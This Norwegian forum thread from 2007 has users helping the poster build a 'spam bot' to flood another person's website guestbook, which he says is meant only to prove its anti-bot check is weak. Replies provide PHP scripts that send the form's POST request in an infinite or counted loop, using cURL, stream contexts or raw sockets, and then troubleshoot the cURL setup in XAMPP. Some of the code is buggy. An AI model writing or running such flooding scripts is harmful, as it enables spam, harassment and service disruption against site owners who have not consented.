Olepetterno Skrevet 25. desember 2007 Skrevet 25. desember 2007 Hvordan kan jeg få denne koden til og gjenta seg x antall ganger? <table border=1 cellspacing=0 cellpadding=2 bordercolor=black align="center" class=sub2> <tr><form action="http://Domene.com/gjestebok.php" method=POST> <td bgcolor="#A12A1C" class="header" colspan=2 align=center>Domenet Spam bot!!</td> </tr> <tr><td> Spam 1(navn): </td><td><input type="text" name="navn" <tr><td> Spam 2(epost): </td><td><input type="text" name="epost" <tr><td> Spam 3(melding): </td><td><input type="text" name="melding" <tr><td> Spam 4(Hjemmeside): </td><td><input type="text" name="hjemmeside" <tr><td> Spam 5(spam): </td><td><input type="text" name="spam" value=""></td></tr> </td></tr> <tr><td> </td><td align=right><input type="submit" name="ok" value="SPAM!"></td></tr> </tr> </form> </table> Det jeg vil er da at det som er fylt inn i feltene skal loopes. Altså det _skal_ spamme den ned. Dette skal ikke brukes mot siden, men kun bevise at han har alt for dårlig sikkerhet.
Olepetterno Skrevet 25. desember 2007 Forfatter Skrevet 25. desember 2007 Er helst intrisert i konkrete eksempler.
KillYou Skrevet 26. desember 2007 Skrevet 26. desember 2007 Vist du ikke vet hvordan det skal gjøres hvordan kan du da vite at han har for dårlig sikkerhet? Men hva er det du vil "loope"? informasjonen til deg eller til serveren? altså vil du loope output altså html koden, eller input altså php POST?
Olepetterno Skrevet 26. desember 2007 Forfatter Skrevet 26. desember 2007 Vist du ikke vet hvordan det skal gjøres hvordan kan du da vite at han har for dårlig sikkerhet? Men hva er det du vil "loope"? informasjonen til deg eller til serveren? altså vil du loope output altså html koden, eller input altså php POST? Han har dårlig sikkerhet.(ikke mer og si om det) Jeg vil loope informasjonen som blir skrevet inn i feltene. Slik at gjesteboken blir _spammet_
KillYou Skrevet 26. desember 2007 Skrevet 26. desember 2007 Jeg vil tro at du trenger en server med php og cURL. kan hende det går ann uten cURL, men vet ikke. siden det er input som du vil loope er vel denne også feilpostet. Kan komme med et eksempel senere, men ikke nå iom at det blir på en måte et planlagt angrep på siden hans og hadde det vert meg hadde jeg blitt sur, uansett hvor dårlig sikkerhet.
KillYou Skrevet 26. desember 2007 Skrevet 26. desember 2007 (endret) <?PHP function post($url, $data) { global $ch; $options = array( CURLOPT_POST => 1, CURLOPT_POSTFIELDS => $data, CURLOPT_URL => $url, ); curl_setopt_array($ch, $options); $page = curl_exec($ch); return $page; } $url = "http://Domene.com/gjestebok.php"; $navn = ""; //NAVN $epost = ""; //EPOST $melding = ""; //MELDING $hjemmeside = ""; //HJEMMESIDE $data = "navn=$navn&epost=$epost&melding=$melding&text=$hjemmeside"; while(1){ post($url, $data); } ?> Noe slikt? har ikke prøvd det da. Vis en mod har noe imot dette let me know. Endret 26. desember 2007 av KillYou
Olepetterno Skrevet 27. desember 2007 Forfatter Skrevet 27. desember 2007 (endret) <?PHP function post($url, $data) { global $ch; $options = array( CURLOPT_POST => 1, CURLOPT_POSTFIELDS => $data, CURLOPT_URL => $url, ); curl_setopt_array($ch, $options); $page = curl_exec($ch); return $page; } $url = "http://Domene.com/gjestebok.php"; $navn = ""; //NAVN $epost = ""; //EPOST $melding = ""; //MELDING $hjemmeside = ""; //HJEMMESIDE $data = "navn=$navn&epost=$epost&melding=$melding&text=$hjemmeside"; while(1){ post($url, $data); } ?> Noe slikt? har ikke prøvd det da. Vis en mod har noe imot dette let me know. Takk, og som sagt, dette skal IKKE bruke mot siden hans. Dette skal kun ilustrere at antiboten hans er fryktelig. Det er ikke mulig uten curl? Hosten min har deverre ikke mulighet for curl... (one.com) Men anyway tusen takk Finnes ikke gratis host med curl? Endret 27. desember 2007 av Tagliano
KillYou Skrevet 27. desember 2007 Skrevet 27. desember 2007 Du kan jo sette opp XAMPP lokalt på din egen pc. ellers vet ikke jeg om noen annen måte. Har han en antibot skulle nok dette bli stoppet.
KillYou Skrevet 27. desember 2007 Skrevet 27. desember 2007 Snakket med en venn og han sa det kunne fungere med fsockopen/fputs men jeg har ingen erfaring med noen av de og gidder ikke sette meg inn i det bare for dette.
LoS Skrevet 27. desember 2007 Skrevet 27. desember 2007 Det her er vel strengt tatt ikke ett sikkerhetsspørsmål er det? Hvis folk på død og liv må spamme gjesteboka så må dem få lov til det.
Olepetterno Skrevet 28. desember 2007 Forfatter Skrevet 28. desember 2007 (endret) Du kan jo sette opp XAMPP lokalt på din egen pc. ellers vet ikke jeg om noen annen måte. Har han en antibot skulle nok dette bli stoppet. Dette blir nok ikke stoppet. Det er bare et sprm: "Hva er hovedstaden i Norge?" Los: Saken er at han tror han har god nok sikkerhet. Han skal vurdere og stoppe om jeg kan motbevise det. EDIT: Fikk en feilmelding når jeg kjørte filen via XAMPP: Fatal error: Call to undefined function curl_setopt_array() in C:\xampp\htdocs\kimmehamm.php on line 12 Endret 28. desember 2007 av Tagliano
KillYou Skrevet 28. desember 2007 Skrevet 28. desember 2007 Åpne filene \php\php.ini \apache\bin\php.ini og søk etter curl og fjern semikolonet foran begge to, restart og prøv på nytt. så forresten at jeg hadde glemt noe i forige eksempel. <?PHP function post($url, $data) { global $ch; $options = array( CURLOPT_POST => 1, CURLOPT_POSTFIELDS => $data, CURLOPT_URL => $url, ); curl_setopt_array($ch, $options); $page = curl_exec($ch); return $page; } $url = "http://Domene.com/gjestebok.php"; $navn = ""; //NAVN $epost = ""; //EPOST $melding = ""; //MELDING $hjemmeside = ""; //HJEMMESIDE $spam = ""; //SPAM $data = "navn=$navn&epost=$epost&melding=$melding&text=$hjemmeside&spam=$spam"; while(1){ post($url, $data); } ?>
Olepetterno Skrevet 28. desember 2007 Forfatter Skrevet 28. desember 2007 (endret) Åpne filene \php\php.ini \apache\bin\php.ini og søk etter curl og fjern semikolonet foran begge to, restart og prøv på nytt. så forresten at jeg hadde glemt noe i forige eksempel. <?PHP function post($url, $data) { global $ch; $options = array( CURLOPT_POST => 1, CURLOPT_POSTFIELDS => $data, CURLOPT_URL => $url, ); curl_setopt_array($ch, $options); $page = curl_exec($ch); return $page; } $url = "http://Domene.com/gjestebok.php"; $navn = ""; //NAVN $epost = ""; //EPOST $melding = ""; //MELDING $hjemmeside = ""; //HJEMMESIDE $spam = ""; //SPAM $data = "navn=$navn&epost=$epost&melding=$melding&text=$hjemmeside&spam=$spam"; while(1){ post($url, $data); } ?> Har du testet koden selv? Jeg får den nemmelig ikke til og funke... Får en hel side med feilmelding: Warning: curl_setopt_array(): supplied argument is not a valid cURL handle resource in C:\xampp\htdocs\spambot.php on line 12 Warning: curl_exec(): supplied argument is not a valid cURL handle resource in C:\xampp\htdocs\spambot.php on line 14 De kommer omigjen og omigjen nedover... Var slik som dette det skulle se ut i php.ini sant?: ;extension=php_apc.dll ;extension=php_apd.dll ;extension=php_bcompiler.dll ;extension=php_bitset.dll ;extension=php_blenc.dll ;extension=php_bz2.dll ;extension=php_bz2_filter.dll ;extension=php_classkit.dll ;extension=php_cpdf.dll ;extension=php_crack.dll extension=php_curl.dll Endret 28. desember 2007 av Tagliano
grimjoey Skrevet 28. desember 2007 Skrevet 28. desember 2007 Når du installerer php må du spesifisere at det skal installeres med curl. dette gjøres i installasjonsprogrammet. vet ikke om det samme gjelder xampp. søk etter php_curl.dll. finnes ikke filen har du ikke installert modulen. uten curl: php 5: function do_post_request($url, $data, $optional_headers = null) { $params = array('http' => array( 'method' => 'POST', 'content' => $data )); if ($optional_headers !== null) { $params['http']['header'] = $optional_headers; } $ctx = stream_context_create($params); $fp = @fopen($url, 'rb', false, $ctx); if (!$fp) { throw new Exception("Problem with $url, $php_errormsg"); } $response = @stream_get_contents($fp); if ($response === false) { throw new Exception("Problem reading data from $url, $php_errormsg"); } return $response; } php 4: function do_post_request($url, $data, $optional_headers = null) { $start = strpos($url,'//')+2; $end = strpos($url,'/',$start); $host = substr($url, $start, $end-$start); $domain = substr($url,$end); $fp = pfsockopen($host, 80); if(!$fp) return null; fputs ($fp,"POST $domain HTTP/1.1\n"); fputs ($fp,"Host: $host\n"); if ($optional_headers) { fputs($fp, $optional_headers); } fputs ($fp,"Content-type: application/x-www-form-urlencoded\n"); fputs ($fp,"Content-length: ".strlen($data)."\n\n"); fputs ($fp,"$data\n\n"); $response = ""; while(!feof($fp)) { $response .= fgets($fp, 1024); } fclose ($fp); return $response; } fant disse her jeg tror data skal være noe slikt: $data = 'var1=value1&var2=value2';
KillYou Skrevet 28. desember 2007 Skrevet 28. desember 2007 Oops glemte noe du må hente ut en php_curl.dll fra php\ext og legge den til i windows\system32. prøv det. nei har ikke prøvd koden selv i og med at jeg ikke har en host å teste den mot. Vist du kjører vanlig XAMPP skal alt du trenger å gjøre er å kopiere den dll filen og avkommentere den linjen slik du har gjort.
Olepetterno Skrevet 28. desember 2007 Forfatter Skrevet 28. desember 2007 Oops glemte noe du må hente ut en php_curl.dll fra php\ext og legge den til i windows\system32. prøv det. nei har ikke prøvd koden selv i og med at jeg ikke har en host å teste den mot. Vist du kjører vanlig XAMPP skal alt du trenger å gjøre er å kopiere den dll filen og avkommentere den linjen slik du har gjort. Hmm, det funker ikke enda... Alt som skal instialeres følger med i den filen man laster ned sant? Php skal ikke instialeres for seg selv?
Martin A. Skrevet 28. desember 2007 Skrevet 28. desember 2007 Du vet at du må restarte Apache når du har gjort endringer i konfigurasjonen? Hvis det fremdeles ikke funker, lag en fil med dette innholdet, og se om cURL er lastet der; <?php phpinfo(); ?>
KillYou Skrevet 28. desember 2007 Skrevet 28. desember 2007 Ser ut som du mangler noen andre funksjoner, som ligger i et annet script her. skal se om jeg får fikset det snart
grimjoey Skrevet 28. desember 2007 Skrevet 28. desember 2007 nå ga jeg deg to funksjoner som gjør at du ikke trenger curl. sett inn den aktuelle funksjonen. er du usikker bruk PHP 4 versionen. $data['navn'] = 'Ønsket navn'; $data['epost'] = 'Epost adresse'; $data['melding'] = 'melding her'; $data['hjemmeside'] = 'hjemmeside her'; $data['spam'] = 'aner ikke hva denne inputen egentlig er god for. mulig det må stå oslo dersom det er antibot input'; $url = 'samme som står i action i form taggen'; $datastring = ''; foreach ($data as $key => $value) { $datastring .= "$key=$value&"; } $datastring = substr($datastring, 0, -1); $antall = '10'; // sett inn antall ganger det skal postes while ($antall) { do_post_request($url, urlencode($datastring)); $antall--; }
KillYou Skrevet 29. desember 2007 Skrevet 29. desember 2007 function do_post_request($url, $data, $optional_headers = null) { $params = array('http' => array( 'method' => 'POST', 'content' => $data )); if ($optional_headers !== null) { $params['http']['header'] = $optional_headers; } $ctx = stream_context_create($params); $fp = @fopen($url, 'rb', false, $ctx); if (!$fp) { throw new Exception("Problem with $url, $php_errormsg"); } $response = @stream_get_contents($fp); if ($response === false) { throw new Exception("Problem reading data from $url, $php_errormsg"); } return $response; } $data['navn'] = 'Ønsket navn'; $data['epost'] = 'Epost adresse'; $data['melding'] = 'melding her'; $data['hjemmeside'] = 'hjemmeside her'; $data['spam'] = 'aner ikke hva denne inputen egentlig er god for. mulig det må stå oslo dersom det er antibot input'; $url = 'samme som står i action i form taggen'; $datastring = ''; foreach ($data as $key => $value) { $datastring .= "$key=$value&"; } $datastring = substr($datastring, 0, -1); $antall = '10'; // sett inn antall ganger det skal postes while ($antall) { do_post_request($url, urlencode($datastring)); $antall--; } prøvde du det?
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå